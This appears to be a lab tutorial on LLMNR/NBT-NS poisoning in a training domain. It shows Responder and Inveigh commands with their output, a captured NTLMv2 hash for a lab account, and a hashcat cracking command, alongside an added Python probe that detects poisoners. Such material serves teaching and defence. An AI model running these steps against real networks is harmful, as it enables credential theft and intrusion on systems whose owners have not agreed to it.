LLMNR/NBT-NS Poisoning

Quick Example
Let's walk through a quick example of the attack flow at a very high level:
1. A host attempts to connect to the print server at \\print01.inlanefreight.local, but accidentally types in \\printer01.inlanefreight.local.
2. The DNS server responds, stating that this host is unknown.
3. The host then broadcasts out to the entire local network asking if anyone knows the location of \\printer01.inlanefreight.local.
4. The attacker (us with Responder running) responds to the host stating that it is the \\printer01.inlanefreight.local that the host is looking for.
5. The host believes this reply and sends an authentication request to the attacker with a username and NTLMv2 password hash.
6. This hash can then be cracked offline or used in an SMB Relay attack if the right conditions exist.
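The flow above can be turned into a check a defender runs on their own segment. The following is an added example (written for these notes, not code from the original page, Responder or Inveigh): it builds an LLMNR query for a canary name that no host legitimately owns, parses whatever comes back in LLMNR's DNS-style wire format, and treats any answer as evidence of a poisoner. The canary name, the interface IP passed to probe(), and the sample response bytes are constructed for illustration.

```python
import os
import socket
import struct
def build_query(name, txid):
    """Standard LLMNR query: DNS-style header, QNAME labels, QTYPE A, QCLASS IN."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)  # id, flags, qd, an, ns, ar
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)

def _skip_name(pkt, off):
    """Advance past a DNS-style name: a 2-byte compression pointer or a label chain."""
    if pkt[off] & 0xC0 == 0xC0:
        return off + 2
    while pkt[off]:
        off += pkt[off] + 1
    return off + 1

def parse_answers(pkt, txid):
    """Return the A-record IPs in a response to our query; [] if it is not one."""
    if len(pkt) < 12:
        return []
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if rid != txid or not flags & 0x8000:  # wrong transaction id, or not a response
        return []
    off = 12
    for _ in range(qd):  # skip the echoed question section (name + QTYPE/QCLASS)
        off = _skip_name(pkt, off) + 4
    ips = []
    for _ in range(an):
        off = _skip_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(pkt[off:off + 4]))
        off += rdlen
    return ips

def probe(iface_ip, canary="canary-does-not-exist", timeout=2.0):
    """Live check: multicast the canary query; any answer means a poisoner is present."""
    txid = int.from_bytes(os.urandom(2), "big")  # random id so stray packets are ignored
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.inet_aton(iface_ip))
    s.settimeout(timeout)
    s.sendto(build_query(canary, txid), ("224.0.0.252", 5355))  # LLMNR group and port
    try:
        pkt, src = s.recvfrom(1024)
    except socket.timeout:
        return None  # silence is the healthy result
    ips = parse_answers(pkt, txid)
    return (src[0], ips) if ips else None
```

parse_answers() can be exercised offline on a hand-built response; probe() needs a live interface and is meant to be run from an ordinary host on the segment being monitored, where a non-None result is worth an alert.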
Tools
Tool: Description
Responder: a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.
Inveigh: a cross-platform MITM platform that can be used for spoofing and poisoning attacks.
Metasploit: has several built-in scanners and spoofing modules made to deal with poisoning attacks.
Both Responder and Inveigh can attack the following protocols: LLMNR, DNS, MDNS, NBNS, DHCP, ICMP, HTTP, HTTPS, SMB, LDAP, WebDAV, and Proxy Auth.
Responder additionally supports:
- MSSQL
- DCE-RPC
- FTP, POP3, IMAP, and SMTP auth
Sample Exploitation
Linux
Start Responder
$ sudo responder -I ens224

NBT-NS, LLMNR & MDNS Responder 3.0.6.0

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [ens224]
    Responder IP               [172.16.5.225]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-72Y80BU39K4]
    Responder Domain Name      [124M.LOCAL]
    Responder DCE-RPC Port     [49109]

[!] Error starting TCP server on port 3389, check permissions or other servers running.
[+] Listening for events...

[*] [LLMNR] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0
[*] [MDNS] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0.local
[*] [MDNS] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0.local
[*] [LLMNR] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0
[*] [MDNS] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0.local
[*] [LLMNR] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0
[*] [MDNS] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0.local
[*] [LLMNR] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0
[*] [MDNS] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0.local
[*] [LLMNR] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0
[*] Skipping previously captured hash for INLANEFREIGHT\lab_adm
[SMB] NTLMv2-SSP Client   : 172.16.5.130
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\backupagent
[SMB] NTLMv2-SSP Hash     : backupagent::INLANEFREIGHT:63d7f544c395e21e:A0FDD20C576AA5BA6901A4B8E25101F4:010100000000000000558A1501E3D901AE687130E3EBF6FB00000000020008003100320034004D0001001E00570049004E002D003700320059003800300042005500330039004B00340004003400570049004E002D003700320059003800300042005500330039004B0034002E003100320034004D002E004C004F00430041004C00030014003100320034004D002E004C004F00430041004C00050014003100320034004D002E004C004F00430041004C000700080000558A1501E3D9010600040002000000080030003000000000000000000000000030000083E026FD817AC3DDCEFFFEDEE543B62660CE84A9C2C47D025FBB90D92498E24B0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000
Cracking NTLMv2 hash with hashcat
$ cat hash.txt
backupagent::INLANEFREIGHT:13409d5f8e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
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Once hashcat finishes, we have the user's plaintext password.
Windows
Start Inveigh
PS C:\htb> Import-Module .\Inveigh.ps1
PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

[*] Inveigh 1.506 started at 2022-02-28T19:26:30
[+] Elevated Privilege Mode = Enabled
[+] Primary IP Address = 172.16.5.25
[+] Spoofer IP Address = 172.16.5.25
[+] ADIDNS Spoofer = Disabled
[+] DNS Spoofer = Enabled
[+] DNS TTL = 30 Seconds
[+] LLMNR Spoofer = Enabled
[+] LLMNR TTL = 30 Seconds
[+] mDNS Spoofer = Disabled
[+] NBNS Spoofer For Types 00,20 = Enabled
[+] NBNS TTL = 165 Seconds
[+] SMB Capture = Enabled
[+] HTTP Capture = Enabled
[+] HTTPS Certificate Issuer = Inveigh
[+] HTTPS Certificate CN = localhost
[+] HTTPS Capture = Enabled
[+] HTTP/HTTPS Authentication = NTLM
[+] WPAD Authentication = NTLM
[+] WPAD NTLM Authentication Ignore List = Firefox
[+] WPAD Response = Enabled
[+] Kerberos TGT Capture = Disabled
[+] Machine Account Capture = Disabled
[+] Console Output = Full
[+] File Output = Enabled
[+] Output Directory = C:\Tools
WARNING: [!] Run Stop-Inveigh to stop
[*] Press any key to stop console output
WARNING: [-] [2022-02-28T19:26:31] Error starting HTTP listener
WARNING: [!] [2022-02-28T19:26:31] Exception calling "Start" with "0" argument(s): "An attempt was made to access a socket in a way forbidden by its access permissions"
$HTTP_listener.Start()
[+] [2022-02-28T19:26:31] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
[+] [2022-02-28T19:26:31] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
[+] [2022-02-28T19:26:31] LLMNR request for academy-ea-web0 received from 172.16.5.125 [response sent]
[+] [2022-02-28T19:26:32] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
[+] [2022-02-28T19:26:32] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
[+] [2022-02-28T19:26:32] LLMNR request for academy-ea-web0 received from 172.16.5.125 [response sent]
[+] [2022-02-28T19:26:32] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
[+] [2022-02-28T19:26:32] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
[+] [2022-02-28T19:26:32] LLMNR request for academy-ea-web0 received from 172.16.5.125 [response sent]
[+] [2022-02-28T19:26:33] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
[+] [2022-02-28T19:26:33] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
[+] [2022-02-28T19:26:33] LLMNR request for academy-ea-web0 received from 172.16.5.125 [response sent]
[+] [2022-02-28T19:26:34] TCP(445) SYN packet detected from 172.16.5.125:56834
[+] [2022-02-28T19:26:34] SMB(445) negotiation request detected from 172.16.5.125:56834
[+] [2022-02-28T19:26:34] SMB(445) NTLM challenge 7E3B0E53ADB4AE51 sent to 172.16.5.125:56834
Retrieve the captured hash from the output directory and crack it with hashcat, using the same method as on Linux.